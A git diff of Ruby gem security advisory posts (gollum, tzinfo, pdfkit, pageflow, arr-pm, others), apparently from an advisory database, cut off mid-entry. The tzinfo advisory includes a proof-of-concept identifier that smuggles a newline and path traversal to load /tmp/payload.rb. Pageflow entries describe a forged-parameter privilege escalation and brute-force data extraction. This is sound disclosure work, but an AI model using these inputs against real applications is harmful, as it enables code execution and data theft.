-    url:
-    - https://github.com/gollum/gollum/releases/tag/v5.1.2
----
+---
+layout: advisory
+title: 'CVE-2020-35305 (gollum): XSS via `filename` parameter to New Page dialog'
+comments: false
+categories:
+- gollum
+advisory:
+  gem: gollum
+  cve: 2020-35305
+  ghsa: fj2w-qmjp-3rjm
+  url: https://github.com/gollum/gollum/commit/137728cdabc0f60859fcd30404ad2b8fff6ef715
+  title: XSS via `filename` parameter to New Page dialog
+  date: 2022-07-16
+  description: |
+    Cross site scripting (XSS) in gollum 5.0 to 5.1.2 via the `filename` parameter
+    to the 'New Page' dialog.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 5.0"
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/gollum/gollum/releases/tag/v5.1.2
+---
diff --git a/advisories/_posts/2022-07-21-CVE-2022-31163.md b/advisories/_posts/2022-07-21-CVE-2022-31163.md
index f4cee16b..d9026519 100644
--- a/advisories/_posts/2022-07-21-CVE-2022-31163.md
+++ b/advisories/_posts/2022-07-21-CVE-2022-31163.md
@@ -1,86 +1,86 @@
----
-layout: advisory
-title: 'CVE-2022-31163 (tzinfo): TZInfo relative path traversal vulnerability allows
-  loading of arbitrary files'
-comments: false
-categories:
-- tzinfo
-advisory:
-  gem: tzinfo
-  cve: 2022-31163
-  ghsa: 5cm2-9h8c-rvfx
-  url: https://github.com/tzinfo/tzinfo/security/advisories/GHSA-5cm2-9h8c-rvfx
-  title: TZInfo relative path traversal vulnerability allows loading of arbitrary
-    files
-  date: 2022-07-21
-  description: |
-    # Impact
-
-    ## Affected versions
-
-    - 0.3.60 and earlier.
-    - 1.0.0 to 1.2.9 when used with the Ruby data source (tzinfo-data).
-
-    ## Vulnerability
-
-    With the Ruby data source (the tzinfo-data gem for tzinfo version 1.0.0 and
-    later and built-in to earlier versions), time zones are defined in Ruby files.
-    There is one file per time zone. Time zone files are loaded with `require` on
-    demand. In the affected versions, `TZInfo::Timezone.get` fails to validate
-    time zone identifiers correctly, allowing a new line character within the
-    identifier. With Ruby version 1.9.3 and later, `TZInfo::Timezone.get` can be
-    made to load unintended files with `require`, executing them within the Ruby
-    process.
-
-    For example, with version 1.2.9, you can run the following to load a file with
-    path `/tmp/payload.rb`:
-
-    ```ruby
-    TZInfo::Timezone.get(\"foo\
-    /../../../../../../../../../../../../../../../../tmp/payload\")
-    ```
-
-    The exact number of parent directory traversals needed will vary depending on
-    the location of the tzinfo-data gem.
-
-    TZInfo versions 1.2.6 to 1.2.9 can be made to load files from outside of the
-    Ruby load path. Versions up to and including 1.2.5 can only be made to load
-    files from directories within the load path.
-
-    This could be exploited in, for example, a Ruby on Rails application using
-    tzinfo version 1.2.9, that allows file uploads and has a time zone selector
-    that accepts arbitrary time zone identifiers.
-    The CVSS score and severity have been set on this basis.
-
-    Versions 2.0.0 and later are not vulnerable.
-
-    # Patches
-
-    Versions 0.3.61 and 1.2.10 include fixes to correctly validate time zone
-    identifiers.
-
-    Note that version 0.3.61 can still load arbitrary files from the Ruby load
-    path if their name follows the rules for a valid time zone identifier and the
-    file has a prefix of `tzinfo/definition` within a directory in the load path.
-    For example if `/tmp/upload` was in the load path, then
-    `TZInfo::Timezone.get('foo')` could load a file with path
-    `/tmp/upload/tzinfo/definition/foo.rb`. Applications should ensure that
-    untrusted files are not placed in a directory on the load path.
-
-    # Workarounds
-
-    As a workaround, the time zone identifier can be validated before passing to
-    `TZInfo::Timezone.get` by ensuring it matches the regular expression
-    `\\A[A-Za-z0-9+\\-_]+(?:\\/[A-Za-z0-9+\\-_]+)*\\z`.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - ">= 2.0.0"
-  patched_versions:
-  - "~> 0.3.61"
-  - ">= 1.2.10"
-  related:
-    url:
-    - https://github.com/tzinfo/tzinfo/commit/ca29f349856d62cb2b2edb3257d9ddd2f97b3c27
-    - https://github.com/tzinfo/tzinfo/releases/tag/v0.3.61
-    - https://github.com/tzinfo/tzinfo/releases/tag/v1.2.10
----
+---
+layout: advisory
+title: 'CVE-2022-31163 (tzinfo): TZInfo relative path traversal vulnerability allows
+  loading of arbitrary files'
+comments: false
+categories:
+- tzinfo
+advisory:
+  gem: tzinfo
+  cve: 2022-31163
+  ghsa: 5cm2-9h8c-rvfx
+  url: https://github.com/tzinfo/tzinfo/security/advisories/GHSA-5cm2-9h8c-rvfx
+  title: TZInfo relative path traversal vulnerability allows loading of arbitrary
+    files
+  date: 2022-07-21
+  description: |
+    # Impact
+
+    ## Affected versions
+
+    - 0.3.60 and earlier.
+    - 1.0.0 to 1.2.9 when used with the Ruby data source (tzinfo-data).
+
+    ## Vulnerability
+
+    With the Ruby data source (the tzinfo-data gem for tzinfo version 1.0.0 and
+    later and built-in to earlier versions), time zones are defined in Ruby files.
+    There is one file per time zone. Time zone files are loaded with `require` on
+    demand. In the affected versions, `TZInfo::Timezone.get` fails to validate
+    time zone identifiers correctly, allowing a new line character within the
+    identifier. With Ruby version 1.9.3 and later, `TZInfo::Timezone.get` can be
+    made to load unintended files with `require`, executing them within the Ruby
+    process.
+
+    For example, with version 1.2.9, you can run the following to load a file with
+    path `/tmp/payload.rb`:
+
+    ```ruby
+    TZInfo::Timezone.get(\"foo\
+    /../../../../../../../../../../../../../../../../tmp/payload\")
+    ```
+
+    The exact number of parent directory traversals needed will vary depending on
+    the location of the tzinfo-data gem.
+
+    TZInfo versions 1.2.6 to 1.2.9 can be made to load files from outside of the
+    Ruby load path. Versions up to and including 1.2.5 can only be made to load
+    files from directories within the load path.
+
+    This could be exploited in, for example, a Ruby on Rails application using
+    tzinfo version 1.2.9, that allows file uploads and has a time zone selector
+    that accepts arbitrary time zone identifiers.
+    The CVSS score and severity have been set on this basis.
+
+    Versions 2.0.0 and later are not vulnerable.
+
+    # Patches
+
+    Versions 0.3.61 and 1.2.10 include fixes to correctly validate time zone
+    identifiers.
+
+    Note that version 0.3.61 can still load arbitrary files from the Ruby load
+    path if their name follows the rules for a valid time zone identifier and the
+    file has a prefix of `tzinfo/definition` within a directory in the load path.
+    For example if `/tmp/upload` was in the load path, then
+    `TZInfo::Timezone.get('foo')` could load a file with path
+    `/tmp/upload/tzinfo/definition/foo.rb`. Applications should ensure that
+    untrusted files are not placed in a directory on the load path.
+
+    # Workarounds
+
+    As a workaround, the time zone identifier can be validated before passing to
+    `TZInfo::Timezone.get` by ensuring it matches the regular expression
+    `\\A[A-Za-z0-9+\\-_]+(?:\\/[A-Za-z0-9+\\-_]+)*\\z`.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - ">= 2.0.0"
+  patched_versions:
+  - "~> 0.3.61"
+  - ">= 1.2.10"
+  related:
+    url:
+    - https://github.com/tzinfo/tzinfo/commit/ca29f349856d62cb2b2edb3257d9ddd2f97b3c27
+    - https://github.com/tzinfo/tzinfo/releases/tag/v0.3.61
+    - https://github.com/tzinfo/tzinfo/releases/tag/v1.2.10
+---
diff --git a/advisories/_posts/2022-08-11-CVE-2022-35956.md b/advisories/_posts/2022-08-11-CVE-2022-35956.md
index c3265252..32cf2493 100644
--- a/advisories/_posts/2022-08-11-CVE-2022-35956.md
+++ b/advisories/_posts/2022-08-11-CVE-2022-35956.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-35956 (update_by_case): update_by_case before 0.1.3 can be vulnerable
-  to sql injection'
-comments: false
-categories:
-- update_by_case
-advisory:
-  gem: update_by_case
-  cve: 2022-35956
-  ghsa: 33wh-w4m7-c6r8
-  url: https://github.com/camilova/activerecord-update-by-case/security/advisories/GHSA-33wh-w4m7-c6r8
-  title: update_by_case before 0.1.3 can be vulnerable to sql injection
-  date: 2022-08-11
-  description: |
-    Before version 0.1.3 `update_by_case` gem used custom sql strings, and
-    it was not sanitized, making it vulnerable to sql injection. Upgrade to version
-    >= 0.1.3 that uses `Arel` instead to construct the resulting sql statement, with
-    sanitized sql.
-  cvss_v3: 5.8
-  patched_versions:
-  - ">= 0.1.3"
----
+---
+layout: advisory
+title: 'CVE-2022-35956 (update_by_case): update_by_case before 0.1.3 can be vulnerable
+  to sql injection'
+comments: false
+categories:
+- update_by_case
+advisory:
+  gem: update_by_case
+  cve: 2022-35956
+  ghsa: 33wh-w4m7-c6r8
+  url: https://github.com/camilova/activerecord-update-by-case/security/advisories/GHSA-33wh-w4m7-c6r8
+  title: update_by_case before 0.1.3 can be vulnerable to sql injection
+  date: 2022-08-11
+  description: |
+    Before version 0.1.3 `update_by_case` gem used custom sql strings, and
+    it was not sanitized, making it vulnerable to sql injection. Upgrade to version
+    >= 0.1.3 that uses `Arel` instead to construct the resulting sql statement, with
+    sanitized sql.
+  cvss_v3: 5.8
+  patched_versions:
+  - ">= 0.1.3"
+---
diff --git a/advisories/_posts/2022-08-19-CVE-2020-36599.md b/advisories/_posts/2022-08-19-CVE-2020-36599.md
index 4e8c3f1a..a6e56aa1 100644
--- a/advisories/_posts/2022-08-19-CVE-2020-36599.md
+++ b/advisories/_posts/2022-08-19-CVE-2020-36599.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2020-36599 (omniauth): OmniAuth''s `lib/omniauth/failure_endpoint.rb`
-  does not escape `message_key` value'
-comments: false
-categories:
-- omniauth
-advisory:
-  gem: omniauth
-  cve: 2020-36599
-  ghsa: pm55-qfxr-h247
-  url: https://github.com/omniauth/omniauth/commit/43a396f181ef7d0ed2ec8291c939c95e3ed3ff00#diff-575abda9deb9b1a77bf534e898a923029b9a61e991d626db88dc6e8b34260aa2
-  title: OmniAuth's `lib/omniauth/failure_endpoint.rb` does not escape `message_key`
-    value
-  date: 2022-08-19
-  description: |
-    lib/omniauth/failure_endpoint.rb in OmniAuth before 1.9.2 (and before
-    2.0) does not escape the message_key value.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 1.9.2"
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2020-36599 (omniauth): OmniAuth''s `lib/omniauth/failure_endpoint.rb`
+  does not escape `message_key` value'
+comments: false
+categories:
+- omniauth
+advisory:
+  gem: omniauth
+  cve: 2020-36599
+  ghsa: pm55-qfxr-h247
+  url: https://github.com/omniauth/omniauth/commit/43a396f181ef7d0ed2ec8291c939c95e3ed3ff00#diff-575abda9deb9b1a77bf534e898a923029b9a61e991d626db88dc6e8b34260aa2
+  title: OmniAuth's `lib/omniauth/failure_endpoint.rb` does not escape `message_key`
+    value
+  date: 2022-08-19
+  description: |
+    lib/omniauth/failure_endpoint.rb in OmniAuth before 1.9.2 (and before
+    2.0) does not escape the message_key value.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 1.9.2"
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2022-09-10-CVE-2022-25765.md b/advisories/_posts/2022-09-10-CVE-2022-25765.md
index 256c7404..6e4ee560 100644
--- a/advisories/_posts/2022-09-10-CVE-2022-25765.md
+++ b/advisories/_posts/2022-09-10-CVE-2022-25765.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-25765 (pdfkit): PDFKit vulnerable to Command Injection'
-comments: false
-categories:
-- pdfkit
-advisory:
-  gem: pdfkit
-  cve: 2022-25765
-  ghsa: rhwx-hjx2-x4qr
-  url: https://github.com/pdfkit/pdfkit/blob/46cdf53ec540da1a1a2e4da979e3e5fe2f92a257/lib/pdfkit/pdfkit.rb#L55-L58
-  title: PDFKit vulnerable to Command Injection
-  date: 2022-09-10
-  description: |
-    The package pdfkit from version 0.0.0 through version 0.8.6 is vulnerable
-    to Command Injection where the URL is not properly sanitized.
-  cvss_v3: 9.8
-  related:
-    url:
-    - https://github.com/pdfkit/pdfkit/blob/master/lib/pdfkit/source.rb#L44-L50
-    - https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
-  patched_versions:
-  - ">= 0.8.7.2"
----
+---
+layout: advisory
+title: 'CVE-2022-25765 (pdfkit): PDFKit vulnerable to Command Injection'
+comments: false
+categories:
+- pdfkit
+advisory:
+  gem: pdfkit
+  cve: 2022-25765
+  ghsa: rhwx-hjx2-x4qr
+  url: https://github.com/pdfkit/pdfkit/blob/46cdf53ec540da1a1a2e4da979e3e5fe2f92a257/lib/pdfkit/pdfkit.rb#L55-L58
+  title: PDFKit vulnerable to Command Injection
+  date: 2022-09-10
+  description: |
+    The package pdfkit from version 0.0.0 through version 0.8.6 is vulnerable
+    to Command Injection where the URL is not properly sanitized.
+  cvss_v3: 9.8
+  related:
+    url:
+    - https://github.com/pdfkit/pdfkit/blob/master/lib/pdfkit/source.rb#L44-L50
+    - https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
+  patched_versions:
+  - ">= 0.8.7.2"
+---
diff --git a/advisories/_posts/2022-09-15-GHSA-qcqv-38jg-2r43.md b/advisories/_posts/2022-09-15-GHSA-qcqv-38jg-2r43.md
index 39f0bf5d..a7b3ad80 100644
--- a/advisories/_posts/2022-09-15-GHSA-qcqv-38jg-2r43.md
+++ b/advisories/_posts/2022-09-15-GHSA-qcqv-38jg-2r43.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'GHSA-qcqv-38jg-2r43 (pageflow): Pageflow vulnerable to insecure direct object
-  reference in membership update endpoint'
-comments: false
-categories:
-- pageflow
-advisory:
-  gem: pageflow
-  ghsa: qcqv-38jg-2r43
-  url: https://github.com/codevise/pageflow/security/advisories/GHSA-qcqv-38jg-2r43
-  title: Pageflow vulnerable to insecure direct object reference in membership update
-    endpoint
-  date: 2022-09-15
-  description: |
-    ### Impact
-
-    Pageflow has a membership edit feature which allows users to edit the roles of user
-    memberships associated with an account that they have the `manager` role to (including
-    their own). While the `Entity` dropdown select field is greyed out in the UI, an attacker
-    can use tools which allow sending arbitrary HTTP request to craft a request to the
-    `/admin/users/{user_id}/memberships/{membership_id}` endpoint containing an additional
-    `membership[entity_id]` parameter. This parameter is honored when the membership is
-    updated, allowing an attacker to update the membership object associated with their own
-    account (with `manager` role) to be associated with a different attacker-chosen account
-    instead. Since `account_id`s are enumerable, an attacker can compromise all accounts
-    present on the platform.
-
-    ### Mitigation
-
-    Upgrade to version 15.7.1 or 14.5.2 of the `pageflow` gem.
-  patched_versions:
-  - "~> 14.5.2"
-  - ">= 15.7.1"
-  related:
-    url:
-    - https://github.com/codevise/pageflow/pull/1862
----
+---
+layout: advisory
+title: 'GHSA-qcqv-38jg-2r43 (pageflow): Pageflow vulnerable to insecure direct object
+  reference in membership update endpoint'
+comments: false
+categories:
+- pageflow
+advisory:
+  gem: pageflow
+  ghsa: qcqv-38jg-2r43
+  url: https://github.com/codevise/pageflow/security/advisories/GHSA-qcqv-38jg-2r43
+  title: Pageflow vulnerable to insecure direct object reference in membership update
+    endpoint
+  date: 2022-09-15
+  description: |
+    ### Impact
+
+    Pageflow has a membership edit feature which allows users to edit the roles of user
+    memberships associated with an account that they have the `manager` role to (including
+    their own). While the `Entity` dropdown select field is greyed out in the UI, an attacker
+    can use tools which allow sending arbitrary HTTP request to craft a request to the
+    `/admin/users/{user_id}/memberships/{membership_id}` endpoint containing an additional
+    `membership[entity_id]` parameter. This parameter is honored when the membership is
+    updated, allowing an attacker to update the membership object associated with their own
+    account (with `manager` role) to be associated with a different attacker-chosen account
+    instead. Since `account_id`s are enumerable, an attacker can compromise all accounts
+    present on the platform.
+
+    ### Mitigation
+
+    Upgrade to version 15.7.1 or 14.5.2 of the `pageflow` gem.
+  patched_versions:
+  - "~> 14.5.2"
+  - ">= 15.7.1"
+  related:
+    url:
+    - https://github.com/codevise/pageflow/pull/1862
+---
diff --git a/advisories/_posts/2022-09-15-GHSA-wrrw-crp8-979q.md b/advisories/_posts/2022-09-15-GHSA-wrrw-crp8-979q.md
index 61326d1b..27725855 100644
--- a/advisories/_posts/2022-09-15-GHSA-wrrw-crp8-979q.md
+++ b/advisories/_posts/2022-09-15-GHSA-wrrw-crp8-979q.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'GHSA-wrrw-crp8-979q (pageflow): Pageflow vulnerable to sensitive user data
-  extraction via Ransack query injection'
-comments: false
-categories:
-- pageflow
-advisory:
-  gem: pageflow
-  ghsa: wrrw-crp8-979q
-  url: https://github.com/codevise/pageflow/security/advisories/GHSA-wrrw-crp8-979q
-  title: Pageflow vulnerable to sensitive user data extraction via Ransack query injection
-  date: 2022-09-15
-  description: |
-    ### Impact
-
-    The attack allows extracting sensitive properties of database objects that are
-    associated with users or entries belonging to an account that the attacker has access
-    to.
-
-    Pageflow uses the `ActiveAdmin` Ruby library to provide some management features to
-    its users. `ActiveAdmin` relies on the `Ransack` library to implement search
-    functionality. In its default configuration, `Ransack` will allow for query conditions
-    based on properties of associated database objects [1]. The `*_starts_with`,
-    `*_ends_with` or `*_contains` search matchers [2] can then be abused to exfiltrate
-    sensitive string values of associated database objects via character-by-character
-    brute-force.
-
-    [1] https://activerecord-hackery.github.io/ransack/going-further/associations/
-    [2] https://activerecord-hackery.github.io/ransack/getting-started/search-matches/
-
-    ### Mitigation
-
-    Upgrade to version 15.7.1 or 14.5.2 of the `pageflow` gem.
-  patched_versions:
-  - "~> 14.5.2"
-  - ">= 15.7.1"
-  related:
-    url:
-    - https://github.com/codevise/pageflow/pull/1862
----
+---
+layout: advisory
+title: 'GHSA-wrrw-crp8-979q (pageflow): Pageflow vulnerable to sensitive user data
+  extraction via Ransack query injection'
+comments: false
+categories:
+- pageflow
+advisory:
+  gem: pageflow
+  ghsa: wrrw-crp8-979q
+  url: https://github.com/codevise/pageflow/security/advisories/GHSA-wrrw-crp8-979q
+  title: Pageflow vulnerable to sensitive user data extraction via Ransack query injection
+  date: 2022-09-15
+  description: |
+    ### Impact
+
+    The attack allows extracting sensitive properties of database objects that are
+    associated with users or entries belonging to an account that the attacker has access
+    to.
+
+    Pageflow uses the `ActiveAdmin` Ruby library to provide some management features to
+    its users. `ActiveAdmin` relies on the `Ransack` library to implement search
+    functionality. In its default configuration, `Ransack` will allow for query conditions
+    based on properties of associated database objects [1]. The `*_starts_with`,
+    `*_ends_with` or `*_contains` search matchers [2] can then be abused to exfiltrate
+    sensitive string values of associated database objects via character-by-character
+    brute-force.
+
+    [1] https://activerecord-hackery.github.io/ransack/going-further/associations/
+    [2] https://activerecord-hackery.github.io/ransack/getting-started/search-matches/
+
+    ### Mitigation
+
+    Upgrade to version 15.7.1 or 14.5.2 of the `pageflow` gem.
+  patched_versions:
+  - "~> 14.5.2"
+  - ">= 15.7.1"
+  related:
+    url:
+    - https://github.com/codevise/pageflow/pull/1862
+---
diff --git a/advisories/_posts/2022-09-21-CVE-2022-39224.md b/advisories/_posts/2022-09-21-CVE-2022-39224.md
index be19fc2e..8c3efba9 100644
--- a/advisories/_posts/2022-09-21-CVE-2022-39224.md
+++ b/advisories/_posts/2022-09-21-CVE-2022-39224.md
@@ -1,56 +1,56 @@
----
-layout: advisory
-title: 'CVE-2022-39224 (arr-pm): arr-pm vulnerable to arbitrary shell execution when
-  extracting or listing files contained in a malicious rpm'
-comments: false
-categories:
-- arr-pm
-advisory:
-  gem: arr-pm
-  cve: 2022-39224
-  ghsa: 88cv-mj24-8w3q
-  url: https://github.com/jordansissel/ruby-arr-pm/security/advisories/GHSA-88cv-mj24-8w3q
-  title: arr-pm vulnerable to arbitrary shell execution when extracting or listing
-    files contained in a malicious rpm
-  date: 2022-09-21
-  description: |
-    ### Impact
-
-    Arbitrary shell execution is possible when using RPM::File#files and
-    RPM::File#extract if the RPM contains a malicious "payload compressor" field.
-
-    This vulnerability impacts the `extract` and `files` methods of the
-    `RPM::File` class in the affected versions of this library.
-
-    ### Patches
-
-    Version 0.0.12 is available with a fix for these issues.
-
-    ### Workarounds
-
-    When using an affected version of this library (arr-pm), ensure any RPMs
-    being processed contain valid/known payload compressor values. Such values
-    include: gzip, bzip2, xz, zstd, and lzma.
-
-    You can check the payload compressor field in an rpm by using the rpm command
-    line tool. For example:
-
-    ```
-    % rpm -qp example-1.0-1.x86_64.rpm --qf "%{PAYLOADCOMPRESSOR}\n"
-    gzip
-    ```
-
-    ### Impact on known dependent projects
-
-    This library is used by [fpm](https://github.com/jordansissel/fpm). The
-    vulnerability may impact fpm only when using the flag `-s rpm` or
-    `--input-type rpm` to convert a malicious rpm to another format. It does
-    not impact creating rpms.
-  cvss_v3: 7.0
-  patched_versions:
-  - ">= 0.0.12"
-  related:
-    url:
-    - https://github.com/jordansissel/ruby-arr-pm/pull/14
-    - https://github.com/jordansissel/ruby-arr-pm/pull/15
----
+---
+layout: advisory
+title: 'CVE-2022-39224 (arr-pm): arr-pm vulnerable to arbitrary shell execution when
+  extracting or listing files contained in a malicious rpm'
+comments: false
+categories:
+- arr-pm
+advisory:
+  gem: arr-pm
+  cve: 2022-39224
+  ghsa: 88cv-mj24-8w3q
+  url: https://github.com/jordansissel/ruby-arr-pm/security/advisories/GHSA-88cv-mj24-8w3q
+  title: arr-pm vulnerable to arbitrary shell execution when extracting or listing
+    files contained in a malicious rpm
+  date: 2022-09-21
+  description: |
+    ### Impact
+
+    Arbitrary shell execution is possible when using RPM::File#files and
+    RPM::File#extract if the RPM contains a malicious "payload compressor" field.
+
+    This vulnerability impacts the `extract` and `files` methods of the
+    `RPM::File` class in the affected versions of this library.
+
+    ### Patches
+
+    Version 0.0.12 is available with a fix for these issues.
+
+    ### Workarounds
+
+    When using an affected version of this library (arr-pm), ensure any RPMs
+    being processed contain valid/known payload compressor values. Such values
+    include: gzip, bzip2, xz, zstd, and lzma.
+
+    You can check the payload compressor field in an rpm by using the rpm command
+    line tool. For example:
+
+    ```
+    % rpm -qp example-1.0-1.x86_64.rpm --qf "%{PAYLOADCOMPRESSOR}\n"
+    gzip
+    ```
+
+    ### Impact on known dependent projects
+
+    This library is used by [fpm](https://github.com/jordansissel/fpm). The
+    vulnerability may impact fpm only when using the flag `-s rpm` or
+    `--input-type rpm` to convert a malicious rpm to another format. It does
+    not impact creating rpms.
+  cvss_v3: 7.0
+  patched_versions:
+  - ">= 0.0.12"
+  related:
+    url:
+    - https://github.com/jordansissel/ruby-arr-pm/pull/14
+    - https://github.com/jordansissel/ruby-arr-pm/pull/15
+---
diff --git a/advisories/_posts/2022-09-21-GHSA-4qw4-jpp4-8gvp.md b/advisories/_posts/2022-09-21-GHSA-4qw4-jpp4-8gvp.md
index 2b09dc16..48cd3af3 100644
--- a/advisories/_posts/2022-09-21-GHSA-4qw4-jpp4-8gvp.md
+++ b/advisories/_posts/2022-09-21-GHSA-4qw4-jpp4-8gvp.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'GHSA-4qw4-jpp4-8gvp (commonmarker): Unbounded resource exhaustion in cmark-gfm
-  autolink extension may lead to denial of service'
-comments: false
-categories:
-- commonmarker
-advisory:
-  gem: commonmarker
-  ghsa: 4qw4-jpp4-8gvp
-  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-4qw4-jpp4-8gvp
-  title: Unbounded resource exhaustion in cmark-gfm autolink extension may lead to
-    denial of service
-  date: 2022-09-21
-  description: |
-    ### Impact
-
-    CommonMarker uses `cmark-gfm` for rendering [Github Flavored
-    Markdown](https://github.github.com/gfm/). A polynomial time complexity issue
-    in cmark-gfm's autolink extension may lead to unbounded resource exhaustion
-    and subsequent denial of service.
-
-    ### Patches
-
-    This vulnerability has been patched in the following CommonMarker release:
-
-    - v0.23.6
-
-    ### Workarounds
-
-    Disable use of the autolink extension.
-
-    ### References
-    https://en.wikipedia.org/wiki/Time_complexity
-  patched_versions:
-  - ">= 0.23.6"
-  related:
-    url:
-    - https://github.com/gjtorikian/commonmarker/pull/190
-    - https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.6
-    ghsa:
-    - cgh3-p57x-9q7q
----
+---
+layout: advisory
+title: 'GHSA-4qw4-jpp4-8gvp (commonmarker): Unbounded resource exhaustion in cmark-gfm
+  autolink extension may lead to denial of service'
+comments: false
+categories:
+- commonmarker
+advisory:
+  gem: commonmarker
+  ghsa: 4qw4-jpp4-8gvp
+  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-4qw4-jpp4-8gvp
+  title: Unbounded resource exhaustion in cmark-gfm autolink extension may lead to
+    denial of service
+  date: 2022-09-21
+  description: |
+    ### Impact
+
+    CommonMarker uses `cmark-gfm` for rendering [Github Flavored
+    Markdown](https://github.github.com/gfm/). A polynomial time complexity issue
+    in cmark-gfm's autolink extension may lead to unbounded resource exhaustion
+    and subsequent denial of service.
+
+    ### Patches
+
+    This vulnerability has been patched in the following CommonMarker release:
+
+    - v0.23.6
+
+    ### Workarounds
+
+    Disable use of the autolink extension.
+
+    ### References
+    https://en.wikipedia.org/wiki/Time_complexity
+  patched_versions:
+  - ">= 0.23.6"
+  related:
+    url:
+    - https://github.com/gjtorikian/commonmarker/pull/190
+    - https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.6
+    ghsa:
+    - cgh3-p57x-9q7q
+---
diff --git a/advisories/_posts/2022-10-03-GHSA-mgvv-5mxp-xq67.md b/advisories/_posts/2022-10-03-GHSA-mgvv-5mxp-xq67.md
index 10e8388b..ba35bde8 100644
--- a/advisories/_posts/2022-10-03-GHSA-mgvv-5mxp-xq67.md
+++ b/advisories/_posts/2022-10-03-GHSA-mgvv-5mxp-xq67.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'GHSA-mgvv-5mxp-xq67 (sqlite3): SQLite3 addresses vulnerability in packaged
-  version of libsqlite'
-comments: false
-categories:
-- sqlite3
-advisory:
-  gem: sqlite3
-  ghsa: mgvv-5mxp-xq67
-  url: https://github.com/sparklemotion/sqlite3-ruby/security/advisories/GHSA-mgvv-5mxp-xq67
-  title: SQLite3 addresses vulnerability in packaged version of libsqlite
-  date: 2022-10-03
-  description: |
-    ### Summary
-
-    The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from
-    v3.39.3 to [v3.39.4](https://sqlite.org/releaselog/3_39_4.html).
-
-    libsqlite v3.39.4 addresses a vulnerability described as follows in the
-    release notification:
-
-    > Version 3.39.4 is a minimal patch against the prior release that addresses
-    > issues found since the prior release. In particular, a potential
-    > vulnerability in the FTS3 extension has been fixed, so this should be
-    > considered a security update.
-    >
-    > In order to exploit the vulnerability, an attacker must have full SQL access
-    > and must be able to construct a corrupt database with over 2GB of FTS3
-    > content. The problem arises from a 32-bit signed integer overflow.
-
-    This vulnerability has not been assigned a CVE and does not have a severity
-    declared.
-
-    Please note that this advisory only applies to the sqlite3 gem v1.5.0, and
-    only if the packaged libsqlite is being used. If you've overridden defaults at
-    installation time to use system libraries instead of packaged libraries, you
-    should instead pay attention to your distro's libsqlite release announcements.
-
-
-    ### Mitigation
-
-    Upgrade to the rubygem sqlite3 v1.5.1 or later.
-
-    Users who are unable to upgrade the sqlite3 gem may also choose a more
-    complicated mitigation: compile and link sqlite3 against external libsqlite >=
-    3.39.4 which will also address these same issues.
-
-
-    ### References
-
-    - Upstream release notes: https://sqlite.org/releaselog/3_39_4.html
-    - Instructions for compiling against system libraries:
-      https://github.com/sparklemotion/sqlite3-ruby
-  unaffected_versions:
-  - "< 1.5.0"
-  patched_versions:
-  - ">= 1.5.1"
-  related:
-    url:
-    - https://github.com/sparklemotion/sqlite3-ruby/releases/tag/v1.5.1
----
+---
+layout: advisory
+title: 'GHSA-mgvv-5mxp-xq67 (sqlite3): SQLite3 addresses vulnerability in packaged
+  version of libsqlite'
+comments: false
+categories:
+- sqlite3
+advisory:
+  gem: sqlite3
+  ghsa: mgvv-5mxp-xq67
+  url: https://github.com/sparklemotion/sqlite3-ruby/security/advisories/GHSA-mgvv-5mxp-xq67
+  title: SQLite3 addresses vulnerability in packaged version of libsqlite
+  date: 2022-10-03
+  description: |
+    ### Summary
+
+    The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from
+    v3.39.3 to [v3.39.4](https://sqlite.org/releaselog/3_39_4.html).
+
+    libsqlite v3.39.4 addresses a vulnerability described as follows in the
+    release notification:
+
+    > Version 3.39.4 is a minimal patch against the prior release that addresses
+    > issues found since the prior release. In particular, a potential
+    > vulnerability in the FTS3 extension has been fixed, so this should be
+    > considered a security update.
+    >
+    > In order to exploit the vulnerability, an attacker must have full SQL access
+    > and must be able to construct a corrupt database with over 2GB of FTS3
+    > content. The problem arises from a 32-bit signed integer overflow.
+
+    This vulnerability has not been assigned a CVE and does not have a severity
+    declared.
+
+    Please note that this advisory only applies to the sqlite3 gem v1.5.0, and
+    only if the packaged libsqlite is being used. If you've overridden defaults at
+    installation time to use system libraries instead of packaged libraries, you
+    should instead pay attention to your distro's libsqlite release announcements.
+
+
+    ### Mitigation
+
+    Upgrade to the rubygem sqlite3 v1.5.1 or later.
+
+    Users who are unable to upgrade the sqlite3 gem may also choose a more
+    complicated mitigation: compile and link sqlite3 against external libsqlite >=
+    3.39.4 which will also address these same issues.
+
+
+    ### References
+
+    - Upstream release notes: https://sqlite.org/releaselog/3_39_4.html
+    - Instructions for compiling against system libraries:
+      https://github.com/sparklemotion/sqlite3-ruby
+  unaffected_versions:
+  - "< 1.5.0"
+  patched_versions:
+  - ">= 1.5.1"
+  related:
+    url:
+    - https://github.com/sparklemotion/sqlite3-ruby/releases/tag/v1.5.1
+---
diff --git a/advisories/_posts/2022-10-04-CVE-2022-3171.md b/advisories/_posts/2022-10-04-CVE-2022-3171.md
index 8a298c9f..3a05977c 100644
--- a/advisories/_posts/2022-10-04-CVE-2022-3171.md
+++ b/advisories/_posts/2022-10-04-CVE-2022-3171.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2022-3171 (google-protobuf): protobuf-java has a potential Denial of Service
-  issue'
-comments: false
-categories:
-- google-protobuf
-- jruby
-advisory:
-  gem: google-protobuf
-  platform: jruby
-  cve: 2022-3171
